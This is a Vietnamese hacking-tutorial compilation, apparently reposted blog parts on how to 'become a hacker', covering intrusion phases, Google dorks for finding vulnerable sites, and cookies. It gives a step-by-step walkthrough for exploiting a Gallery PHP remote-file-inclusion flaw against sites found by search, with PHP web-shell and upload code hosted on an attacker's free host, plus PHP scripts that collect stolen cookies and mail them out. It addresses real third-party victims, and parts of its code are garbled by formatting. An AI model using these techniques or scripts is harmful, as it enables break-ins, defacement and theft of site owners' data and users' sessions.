Ví dụ trong trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest, thì họ sẽ tìm cách kiểm soát toàn bộ hệ thống. Hacker sẽ tìm cách crack password của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền. John và Riper là hai chương trình crack password rất hay được sử dụng.
+ Pilfering : ( Dùng khi các file chứa pass bị sơ hở )
Thêm một lần nữa các máy tìm kiếm lại đựơc sử dụng để tìm các phương pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn khác có thể là mồi ngon cho hacker.
+ Covering Tracks : ( Xoá dấu vết )
Sau khi đã có những thông tin cần thiết, hacker tìm cách xoá dấu vết, xoá các file log của hệ điều hành làm cho người quản lý không nhận ra hệ thống đã bị xâm nhập hoặc có biêt cũng không tìm ra kẻ xâm nhập là ai.
+ Creating ``Back Doors`` : ( Tạo cửa sau chuẩn bị cho lần xâm nhập tiếp theo được dễ dàng hơn )
Hacker để lại ``Back Doors``, tức là một cơ chế cho phép hacker truy nhập trở lại bằng con đường bí mật không phải tốn nhiều công sức, bằng việc cài đặt Trojan hay tạo user mới (đối với tổ chức có nhiều user). Công cụ ở đây là các loại Trojan, keylog…
+ Denial of Service (DoS) : ( Tấn công kiểu từ chối dịch vụ )
Nêu không thành công trong việc xâm nhập, thì DoS là phương tiện cuối cùng để tấn công hệ thống. Nếu hệ thống không được cấu hình đúng cách, nó sẽ bị phá vỡ và cho phép hacker truy cập. Hoặc trong trường hợp khác thì DoS sẽ làm cho hệ thống không hoạt động được nữa. Các công cụ hay được sử dụng để tấn công DoS là trin00, Pong Of Death, teardrop, các loại nuker, flooder . Cách này rất lợi hại , và vẫn còn sử dụng phổ biến hiện nay .
_ Tuỳ theo hiểu biết và trình độ của mình mà một hacker bỏ qua bước nào . Không nhất thiết phảI làm theo tuần tự . Các bạn hãy nhớ đến câu “ biết người biết ta trăm trận trăm thắng ” .

( Tài liệu của HVA và hackervn.net )

29 . ) Cách tìm các Website bị lỗi :

_ Chắc các bạn biết đến các trang Web chuyên dùng để tìm kiếm thông tin trên mạng chứ ? Nhưng các bạn chắc cũng không ngờ là ta có thể dùng những trang đó để tìm những trang Web bị lỗi ( Tôi vẫn thường dùng trang google.com và khuyên các bạn cũng nên dùng trang này vì nó rất mạnh và hiệu quả ) .
_ Các bạn quan tâm đến lỗi trang Web và muốn tìm chúng bạn chỉ cần vào google.com và đánh đoạn lỗi đó vào sau “allinurl : ” . VD ta có đoạn mã lỗi trang Web sau :

cgi-bin/php.cgi?/etc/passwd

các bạn sẽ đánh :

“allinurl:cgi-bin/php.cgi?/etc/passwd”

Nó sẽ liệt kê ra những trang Web đang bị lỗi này cho các bạn , các bạn hãy nhìn xuống dưới cùng của mỗi mẫu liệt kê ( dòng địa chỉ màu xanh lá cây ) nếu dòng nào viết y chang từ khoá mình nhập vào thì trang đó đã hoặc đang bị lỗi .Các bạn có xâm nhập vào được hay không thì cũng còn tuỳ vào trang Web đó đã fix lỗi này hay chưa nữa .
_ Các bạn quan tâm đến lỗi forum , các bạn muốn tìm forum dạng này để thực tập , chỉ cần nhập từ khoá

powered by

VD sau là để tìm forum dùng Snitz 2000 :

powered by Snitz 2000

_ Tuy nhiên , việc tìm ra đúng forum hoặc trang Web bị lỗi theo cách đó có xác suất không cao , bạn hãy quan tâm đến đoạn string đặc biệt trong URL đặc trưng cho từng kiểu trang Web hoặc forum đó ( cái này rất quan trọng , các bạn hãy tự mình tìm hiểu thêm nhé ) . VD tìm với lỗi Hosting Controller thì ta sẽ có đoạn đặc trưng sau

``/admin hay /advadmin hay /hosting``

ta hãy đánh từ khoá :

allinurl:/advadmin
hoặc allinurl:/admin
hoặc allinurl:/hosting

Nó sẽ liệt kê ra các trang Web có URL dạng :

http://tentrangweb.com/advadmin
hoặc http://tentrangweb.com/admin
hoặc http://tentrangweb.com/hosting

VD với forum UBB có đoạn đặc trưng

``cgi-bin/ultimatebb.cgi?``

Ta cũng tìm tương tự như trên .
Chỉ cần bạn biết cách tìm như vậy rồi thì sau này chỉ cần theo dõi thông tin cập nhật bên trang “Lỗi bảo mật” của HVA do bạn LeonHart post hằng ngày các bạn sẽ hiểu được ý nghĩa của chúng và tự mình kiểm tra .

30 . ) Kỹ thuật hack Web thông qua lỗi Gallery ( một dạng của lỗi php code inject ):

_ Gallery là một công cụ cho phép tạo một gallery ảnh trên web được viết bằng PHP , lợi dụng sơ hở này ta có thể lợi dụng để viết thêm vào đó một mã PHP cho phép ta upload , đó chính là mục đích chính của ta .
_ Trước hết bạn hãy đăng ký một host miễn phí , tốt nhất là bạn đăng ký ở brinkster.com cho dễ . Sau đó bạn mở notepad và tạo file PHP với đoạn mã sau :

CODE
global $PHP_SELF;
echo ``

``;
set_magic_quotes_runtime(1);
if ($act == ``shell``) {
echo ``\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n< xmp > ``;
system($shell);
echo ``

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n``; }
echo `` ``;
? >

Đoạn mã này bạn hãy tạo làm 2 file có tên khác nhau ( nhưng cùng chung một mã ) và đặt tên là :
+ shellphp.php : file này dùng để chạy shell trên victim host .
+ init.php : file này dùng để upload lên trang có host bạn vừa tạo . ( Bạn hãy upload file init.php này lên sớm vì ta sẽ còn sử dụng nó nhưng với đoạn mã khác , bạn quên upload file này lên là tiêu )

Bạn hãy tạo thêm một file PHP với mã sau :

CODE
function handleupload() {
if (is_uploaded_file($_FILES[`userfile`][`tmp_name`])) {
$filename = $_FILES[`userfile`][`tmp_name`];
print ``$filename was uploaded successfuly``;
$realname = $_FILES[`userfile`][`name`];
print ``realname is $realname\n``;
print ``copying file to uploads dir ``.$realname;
copy($_FILES[`userfile`][`tmp_name`],*PATH*.$realna me); // lưu ý *PATH* chúng ta sẽ thay đổi sau
} else {
echo ``Possible file upload attack: filename``.$_FILES[`userfile`][`name`].``.``;
}
}
if ($act == ``upload``) {
handleupload();
}
echo ``

File:

``;
? >

Bạn hãy đặt tên là upload.php , nó sẽ dùng để upload lên trang Web của nạn nhân .
_ Tiếp theo Bạn vào Google, gõ ``Powered by gallery`` rồi enter, Google sẽ liệt kê một đống những site sử dụng Gallery , bạn hãy chọn lấy một trang bất kỳ rồI dùng link sau để thử xem nó còn mắc lỗI Gallery hay không :

http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Nếu bạn thấy hiện lên một ô hình chữ nhật ở phía trên cùng , bên phải của nó là ô lệnh chuyển tiếp có chữ “Go” là coi như bạn đã tìm thấy được đốI tượng rồi đó . Bây giờ bạn đã có thể gõ lệnh thông qua ô chữ nhật đó để hack Web của nạn nhân .
Trước hết bạn hãy gõ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục hiện thời rồi nhấn nút “Go” , khi nó cho kết quả bạn hãy nhanh chóng ghi lại đường dẫn ở phía dướI ( Tôi sẽ sử dụng VD đường dẫn tôi tìm thấy là “/home/abc/xyz/gallery” ).
Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê các thư mục con của nó . Bây giờ bạn hãy nhìn kết quả , bạn sẽ thấy một đống các thư mục con mà ta đã liệt kê . Bạn hãy luôn nhớ là mục đích của chúng ta là tìm một thư mục có thể dùng để upload file upload.php mà ta đã chuẩn bị từ trước do đó bạn hãy xác định cùng tôi bằng cách nhìn vào những chữ cuốI cùng của mỗi hàng kết quả :
+ Bạn hãy loại bỏ trường hợp các thư mục mà có dấu “.” hoặc “..” vì đây là thư mục gốc hoặc là thư mục ảo ( Nó thường được xếp trên cùng của các hàng kết quả ) .
+ Bạn cũng loạI bỏ những hàng có chữ cuối cùng có gắn đuôi ( VD như config.php , check.inc .v.v… ) vì đây là những file chứ không phải là thư mục .
+ Còn lại là những thư mục có thể upload nhưng tôi khuyên bạn nên chọn những hàng chứa tên thư mục mà có chứa số lớn hơn 1 ( Bạn có thể xác định được chúng bằng cách nhìn cột thứ 2 từ trái sang ) , vì như vậy vừa chắc chắn đây là thư mục không phải thư mục ảo , vừa làm cho admin của trang Web đó khó phát hiện khi ta cài file của ta vào . Tôi VD tôi phát hiện ra thư mục “loveyou” có chứa 12 file có thể cho ta upload , như vậy đường dẫn chính thức mà ta upload lên sẽ là :

/home/abc/xyz/Gallery/loveyou

Bây giờ bạn hãy vào account host của bạn, sửa nội dung file init.php giống như mã của file upload.php, nhưng sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ”. Đồng thời cũng chuẩn bị một file upload.php trên máy của bạn với *PATH* là “” ( 2 dấu ngoặc kép ).
Bây giờ là ta đã có thể upload file upload.php lên trang Web của nạn nhân được rồi , bạn hãy nhập địa chỉ sau trên trình duyệt Web của bạn :

http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Bạn sẽ thấy xuất hiện tiếp một khung hình chữ nhật và bên cạnh là có 2 nút lệnh , một là nút “brown” , một là nút “upload” . Nút “brown” bạn dùng để dẫn đến địa chỉ file upload.php bạn đã chuẩn bị trên máy của bạn , nút “upload” khi bạn nhấn vào đó thì nó sẽ upload file upload.php lên trang Web của nạn nhân . Ok , bây giờ coi như bạn đã hoàn thành chặng đường hack Web rồi đó . Từ bây giờ bạn hãy vận dụng để tấn công đối thủ như lấy database , password ( làm tương tự như các bài hướng dẫn hack trước ) , nhưng các bạn chỉ nên thực tập chứ đừng xoá database hay phá Web của họ. Nếu là một hacker chân chính các bạn chỉ cần upload lên trang Web dòng chữ : “Hack by ……..” là đủ rồi .
Cũng như những lần trước , các bạn có thành công hay không cũng tuỳ thuộc vào sự may mắn và kiên trì nghiên cứu vận dụng kiến thức của các bạn .

( Dựa theo hướng dẫn hack của huynh vnofear – viethacker.net )

GOODLUCK!!!!!!!!!!!!

( Hết phần 4 )

Những Hiểu Biết Cơ Bản Để Trở Thành Hacker (phần III)

2007-06-19T01:14:00.002-07:00

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 3

20.) Cookie là gì ?

Cookie là những phần dữ liệu nhỏ có cấu trúc được chia sẻ giữa web site và browser của người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site.

Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen...Cookie được browser của người dùng chấp nhận lưu trên đĩa cứng của máy mình, ko phải browser nào cũng hỗ trợ cookie. Sau một lần truy cập vào site, những thông tin về người dùng được lưu trữ trong cookie. Ở những lần truy cập sau đến site đó, web site có thể dùng lại những thông tin trong cookie (như thông tin liên quan đến việc đăng nhập vào 1 forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhập lại các thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các thông tin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trong cookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạt quyền điêu khiển site .

_ Cookies thường có các thành phần sau :

+ Tên: do người lập trình web site chọn
+ Domain: là tên miền từ server mà cookie được tạo và gửi đi
+ Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem
+ Ngày hết hạn: là thời điểm mà cookie hết hiệu lực .
+ Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơc mã hoá trong quá trình truyền giữa server và browser.
+ Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhận dạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giới hạn trong khoảng 4k.

( Tài liệu của Viethacker.net )

21 . ) Kỹ thuật lấy cắp cookie của nạn nhân :

_ Trước hết , các bạn hãy mở notepad rồi chép đoạn mã sau vào notepad đó :

CODE
define (``LINE``, ``\r\n``);
define (``HTML_LINE``, ``
``);
function getvars($arr, $title)
{
$res = ````;
$len = count($arr);
if ($len > 0)
{
if (strlen($title) > 0)
{
print(``[--------$title--------]`` . HTML_LINE);
$res .= ``[--------$title--------]`` . LINE;
}
foreach ($arr as $key = > $value)
{
print(``[$key]`` . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= ``[$key]`` . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date(``Y-m-d H:i:s``);
// init
$myData = ``[-----$now-----]`` . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, ````);
// file
$file = $REMOTE_ADDR . ``.txt``;
$mode = ``r+``;
if (!file_exists($file))
$mode = ``w+``;
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
? >

hoặc

CODE
if ($contents && $header){
mail(``victim@yahoo.com`` , ``from mail script``,$contents,$header) or
die(`couldnt email it`);
sleep(2);
? >